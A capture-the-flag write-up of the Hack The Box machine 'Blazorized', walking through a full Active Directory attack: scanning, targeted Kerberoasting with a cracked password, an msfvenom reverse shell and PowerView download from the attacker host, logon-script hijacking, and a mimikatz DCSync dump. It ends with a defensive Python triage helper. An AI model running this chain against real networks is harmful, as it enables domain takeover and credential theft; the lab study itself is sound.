Lab: Hack The Box
Address: https://app.hackthebox.com/machines/Blazorized
System: Windows
Topics: AD operations, Windows scheduled tasks
A retired HTB machine; a brief record of the learning process.
Scan the common ports.
~/D/B $nmap -sV -sC -Pn -oN port.log $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-10 10:12 UTC
Nmap scan report for 10.10.11.22
Host is up (0.20s latency).
Not shown: 987 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://blazorized.htb
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-10 09:58:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1115.00; RC0+
| ms-sql-ntlm-info:
| 10.10.11.22\BLAZORIZED:
| Target_Name: BLAZORIZED
| NetBIOS_Domain_Name: BLAZORIZED
| NetBIOS_Computer_Name: DC1
| DNS_Domain_Name: blazorized.htb
| DNS_Computer_Name: DC1.blazorized.htb
| DNS_Tree_Name: blazorized.htb
|_ Product_Version: 10.0.17763
| ms-sql-info:
| 10.10.11.22\BLAZORIZED:
| Instance name: BLAZORIZED
| Version:
| name: Microsoft SQL Server 2022 RC0+
| number: 16.00.1115.00
| Product: Microsoft SQL Server 2022
| Service pack level: RC0
| Post-SP patches applied: true
| TCP port: 1433
|_ Clustered: false
|_ssl-date: 2024-12-10T09:58:57+00:00; -14m09s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-12-10T09:27:38
|_Not valid after: 2054-12-10T09:27:38
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-12-10T09:58:48
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: -14m09s, deviation: 0s, median: -14m09s
Add the domain to the hosts file and scan for subdomains (vhosts).
~/D/B $gobuster vhost -u http://$DOMAIN -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain
Found: admin.blazorized.htb Status: 200 [Size: 2047]
Found: api.blazorized.htb Status: 404 [Size: 0]
Port 80 serves a Blazor WebAssembly application. I had no great interest in digging into it, so I followed the walkthrough to get a shell.
~/D/B $rlwrap nc -nlvp 1234
Listening on 0.0.0.0 1234
Connection received on 10.10.11.22 49223
Microsoft Windows [Version 10.0.17763.5933]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
blazorized\nu_1055
As user nu_1055, add an SPN to user RSA_4810; a service ticket (TGS) hash for that account can then be requested (targeted Kerberoasting).
Run powershell.
PS C:\Users\NU_1055> IEX(New-Object Net.WebClient).downloadString('http://10.10.16.7/PowerView.ps1')
PS C:\Users\NU_1055> Set-DomainObject -Identity RSA_4810 -SET @{serviceprincipalname='htb/softyhack'}
PS C:\Users\NU_1055> Get-DomainUser RSA_4810 -SPN | Get-DomainSPNTicket -Format Hashcat
Get-DomainUser RSA_4810 -SPN | Get-DomainSPNTicket -Format Hashcat
SamAccountName : RSA_4810
DistinguishedName : CN=RSA_4810,CN=Users,DC=blazorized,DC=htb
ServicePrincipalName : htb/softyhack
TicketByteHexStream :
Hash : $krb5tgs$23$*RSA_4810$blazorized.htb$htb/softyhack*$A811745BA1F54E80B6EF0BBDDE87CB8D$08C5A93F003
5DA16B8D858E0ADF6DE44650B8A96CE3F7ADDCB27A641D3BAACA907A861A97D35F7EB837C03B6C3117BE74602D8276D6
... A36C021F1225BBA68323CBB15A977505B51DDF352A302F08583D23A84EF821509A2CA43B32C0EFE051D87AABDF59678F
5D2B0
Crack the hash to recover the password.
~/D/B $john --wordlist=/usr/share/wordlists/rockyou.txt rsa_hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
(Ni7856Do9854Ki05Ng0005 #) (?)
1g 0:00:00:05 DONE (2024-12-10 12:44) 0.1858g/s 2661Kp/s 2661Kc/s 2661KC/s (alejo)..(Camisha)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
This password can be used to log in and get a shell.
~/D/B $netexec smb $IP -u RSA_4810 -p '(Ni7856Do9854Ki05Ng0005 #)'
SMB 10.10.11.22 445 DC1 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC1) (domain:blazorized.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.22 445 DC1 [+] blazorized.htb\RSA_4810:(Ni7856Do9854Ki05Ng0005 #)
~/D/B $netexec winrm $IP -u RSA_4810 -p '(Ni7856Do9854Ki05Ng0005 #)'
WINRM 10.10.11.22 5985 DC1 [*] Windows 10 / Server 2019 Build 17763 (name:DC1) (domain:blazorized.htb)
WINRM 10.10.11.22 5985 DC1 [+] blazorized.htb\RSA_4810:(Ni7856Do9854Ki05Ng0005 #) (Pwn3d!)
User rsa_4810 has no objects it can control directly. This is the hard part: as it turns out, user ssa_6010 has a scheduled task that runs the script in a specific directory every minute.
First, generate a shell script.
msfvenom -p cmd/windows/reverse_powershell lhost=10.10.16.7 lport=2234
Then upload it to the target.
*Evil-WinRM* PS C:\windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23> copy \\10.10.16.7\kali\start.bat .\
*Evil-WinRM* PS C:\windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23> dir
Directory: C:\windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/29/2024 2:34 PM 113EB3B0B2D3
...
d----- 5/29/2024 2:33 PM F1D30FCB0100
d----- 5/29/2024 2:33 PM FD33C0CE11AC
-a---- 5/29/2024 2:33 PM 0 02FCE0D1303F.bat
-a---- 12/10/2024 7:21 AM 1583 start.bat
Then set the scriptPath attribute of user ssa_6010.
Set-ADUser -Identity SSA_6010 -ScriptPath 'C:\windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23\start.bat'
*Evil-WinRM* PS C:\windows>net user ssa_6010
User name SSA_6010
Full Name SSA_6010
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/25/2024 11:56:55 AM
Password expires Never
Password changeable 2/26/2024 11:56:55 AM
Password required Yes
User may change password No
Workstations allowed All
Logon script C:\windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23\start.bat
User profile
Home directory
Last logon 12/10/2024 7:18:45 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users *Super_Support_Adminis
The command completed successfully.
After waiting a minute, the reverse shell comes back.
~/D/B $rlwrap nc -nlvp 2234
Listening on 0.0.0.0 2234
Connection received on 10.10.11.22 49857
Microsoft Windows [Version 10.0.17763.5936]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
blazorized\ssa_6010
Since ssa_6010 has DCSync rights, upload mimikatz and dump the Administrator hash.
.\mimikatz.exe "lsadump::dcsync /domain:blazorized.htb /user:Administrator" exit
.#####. mimikatz 2.2.0 (x86) #18362 Feb 29 2020 11:13:10
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::dcsync /domain:blazorized.htb /user:Administrator
[DC] 'blazorized.htb' will be the domain
[DC] 'DC1.blazorized.htb' will be the DC server
[DC] 'Administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 2/25/2024 11:54:43 AM
Object Security ID : S-1-5-21-2039403211-964143010-2924010611-500
Object Relative ID : 500
Credentials:
Hash NTLM: f55ed1465179ba374ec1cad05b34a5f3
...
Finally, a closer look at why, on Windows, this user runs the script in that specific directory every minute.
Windows has no tool as convenient as pspy64, so we inspect the scheduled tasks by hand.
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ScheduledTask
TaskPath TaskName State
-------- -------- -----
\ CreateExplorerShellUnelevatedTask Ready
\ KillCmdProcesses Ready
\ Script Cleanup Ready
\ SSA_6010_RunScriptPath Ready
\ Start LDAP Ready
\ StartAppPools Ready
\ User_Feed_Synchronization-{B5D... Ready
\ User_Feed_Synchronization-{F8F... Ready
\Microsoft\Windows\ Server Initial Configuration Task Disabled
...
Note the task named SSA_6010_RunScriptPath; let's inspect its triggers and actions.
*Evil-WinRM* PS C:\Users\Administrator\Documents> (Get-ScheduledTask -TaskName "SSA_6010_RunScriptPath").Triggers
Enabled : True
EndBoundary :
ExecutionTimeLimit :
Id :
Repetition : MSFT_TaskRepetitionPattern
StartBoundary :
Delay :
PSComputerName :
*Evil-WinRM* PS C:\Users\Administrator\Documents> (Get-ScheduledTask -TaskName "SSA_6010_RunScriptPath").Triggers.Repetition | Format-List
Duration :
Interval : PT1M
StopAtDurationEnd : False
PSComputerName :
*Evil-WinRM* PS C:\Users\Administrator\Documents> (Get-ScheduledTask -TaskName "SSA_6010_RunScriptPath").Actions
Id :
Arguments : -enc SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQAgAEEAYwB0AGkAdgBlAEQAaQByAGUAYwB0AG8AcgB5ADsACgAkAHAAYQB0AHQAZQByAG4AIAA9ACAAIgBeAEEAMwAyAEYARgAzAEEARQBBAEEAMgAzAFwAXAAqACIAOwAKACQAdQBzAGUAcgBuAGEAbQBlACAAPQAgACIAUwBTAEEAXwA2ADAAMQAwACIAO
wAKACQAcABhAHMAcwB3AG8AcgBkACAAPQAgAEMAbwBuAHYAZQByAHQAVABvAC0AUwBlAGMAdQByAGUAUwB0AHIAaQBuAGcAIAAnAGUAYgAyADMAYgAwADIAOQA5ADUAYwAyAGEAOABkADAAOAA0ACEAZQAzADgANQA5ADYAYgA4ADMAOAA1ADIAYgBmADQAOABkADcAYgBzAGIANwBkADQAZAA3AGYAOABiAGQ
AYgBjADgAZQBlACEANQAwADkANQA1ADQAYwAyAF8AJwAgAC0AQQBzAFAAbABhAGkAbgBUAGUAeAB0ACAALQBGAG8AcgBjAGUAOwAKACQAYwByAGUAZABlAG4AdABpAGEAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtA
GEAdABpAG8AbgAuAFAAUwBDAHIAZQBkAGUAbgB0AGkAYQBsACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACQAdQBzAGUAcgBuAGEAbQBlACwAJABwAGEAcwBzAHcAbwByAGQAOwAKACQAdQBzAGUAcgBzAGMAcgBpAHAAdABQAGEAdABoACAAPQAgACgARwBlAHQALQBBAEQAVQBzAGUAcgAgAC0ASQB
kAGUAbgB0AGkAdAB5ACAAJAB1AHMAZQByAG4AYQBtAGUAIAAtAFAAcgBvAHAAZQByAHQAaQBlAHMAIABzAGMAcgBpAHAAdABQAGEAdABoACkALgBzAGMAcgBpAHAAdABQAGEAdABoADsACgBpAGYAIAAoACQAdQBzAGUAcgBzAGMAcgBpAHAAdABQAGEAdABoACAALQBtAGEAdABjAGgAIAAkAHAAYQB0AHQAZ
QByAG4AKQAgAHsAIAAKACAAIAAkAHUAcwBlAHIAcwBjAHIAaQBwAHQAUABhAHQAaAAgAD0AIAAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABTAFkAUwBWAE8ATABcAHMAeQBzAHYAbwBsAFwAYgBsAGEAegBvAHIAaQB6AGUAZAAuAGgAdABiAFwAcwBjAHIAaQBwAHQAcwBcACQAdQBzAGUAcgBzAGMAcgBpAHA
AdABQAGEAdABoACIAOwAKACAAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlACAAJAB1AHMAZQByAHMAYwByAGkAcAB0AFAAYQB0AGgAIAAtAEMAcgBlAGQAZQBuAHQAaQBhAGwAIAAkAGMAcgBlAGQAZQBuAHQAaQBhAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkA
GQAZQBuADsACgB9ACAAZQBsAHMAZQAgAHsAfQAKAA==
Execute : powershell.exe
WorkingDirectory :
PSComputerName :
Decode this base64-encoded script to recover the PowerShell source, and everything becomes clear.
Import-Module ActiveDirectory;
$pattern = "^A32FF3AEAA23\\*";
$username = "SSA_6010";
$password = ConvertTo-SecureString 'eb23b02995c2a8d084!e38596b83852bf48d7bsb7d4d7f8bdbc8ee!509554c2_' -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential -ArgumentList $username,$password;
$userscriptPath = (Get-ADUser -Identity $username -Properties scriptPath).scriptPath;
if ($userscriptPath -match $pattern) {
$userscriptPath = "C:\Windows\SYSVOL\sysvol\blazorized.htb\scripts\$userscriptPath";
Start-Process -File $userscriptPath -Credential $credential -WindowStyle Hidden;
} else {}
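As an added example (my code, not the write-up's), the decoding step above done programmatically for triage: pull the -enc payload out of a task's Arguments string, decode the UTF-16LE base64, and flag the three weaknesses visible in the decoded runner, a plaintext credential, a launch path taken from the user's writable scriptPath attribute, and a prefix-only path pattern. The Arguments string and inner script are constructed inline to resemble the page's task, with PLACEHOLDER in place of the real password.

```python
import base64
import re

# Constructed sample of the Actions.Arguments string Get-ScheduledTask returns for
# a task that launches "powershell.exe -enc <base64>". The inner script is written
# here to resemble the decoded runner on this page (PLACEHOLDER stands in for the
# real password); it is not the page's own blob.
SAMPLE_SCRIPT = (
    "Import-Module ActiveDirectory;\n"
    '$pattern = "^A32FF3AEAA23\\\\*";\n'
    "$password = ConvertTo-SecureString 'PLACEHOLDER' -AsPlainText -Force;\n"
    "$p = (Get-ADUser -Identity SSA_6010 -Properties scriptPath).scriptPath;\n"
    "if ($p -match $pattern) { Start-Process -File $p -Credential $cred }\n"
)
SAMPLE_ARGUMENTS = "-NoProfile -enc " + base64.b64encode(
    SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

# Review findings worth raising about a decoded task script.
INDICATORS = {
    "plaintext credential": re.compile(
        r"ConvertTo-SecureString\s+'[^']*'\s+-AsPlainText", re.I),
    "launches a path read from an AD scriptPath attribute": re.compile(
        r"Get-ADUser.*scriptPath.*Start-Process", re.I | re.S),
    # "^PREFIX\\*" only pins the first characters: "\\*" is zero or more
    # backslashes, so any scriptPath beginning with the prefix passes the check.
    "prefix-only path pattern": re.compile(r'\$pattern\s*=\s*"\^[^"]*\\\\\*"'),
}


def extract_encoded_command(arguments):
    """Return the base64 after -EncodedCommand (or any prefix: -e, -ec, -enc...)."""
    tokens = arguments.split()
    for flag, value in zip(tokens, tokens[1:]):
        name = flag[1:].lower() if flag.startswith("-") else ""
        if name and "encodedcommand".startswith(name):
            return value
    return None


def decode_encoded_command(b64):
    """powershell.exe expects UTF-16LE; tolerate stripped '=' padding."""
    padded = b64 + "=" * (-len(b64) % 4)
    return base64.b64decode(padded).decode("utf-16-le")


def triage_task_arguments(arguments):
    """Decode a task's Arguments string and list the indicators it trips."""
    b64 = extract_encoded_command(arguments)
    if b64 is None:
        return {"script": None, "findings": []}
    script = decode_encoded_command(b64)
    return {"script": script,
            "findings": [n for n, rx in INDICATORS.items() if rx.search(script)]}
```

Feed it the Arguments value of each task from Get-ScheduledTask output to spot encoded launchers that embed credentials or run attacker-writable paths.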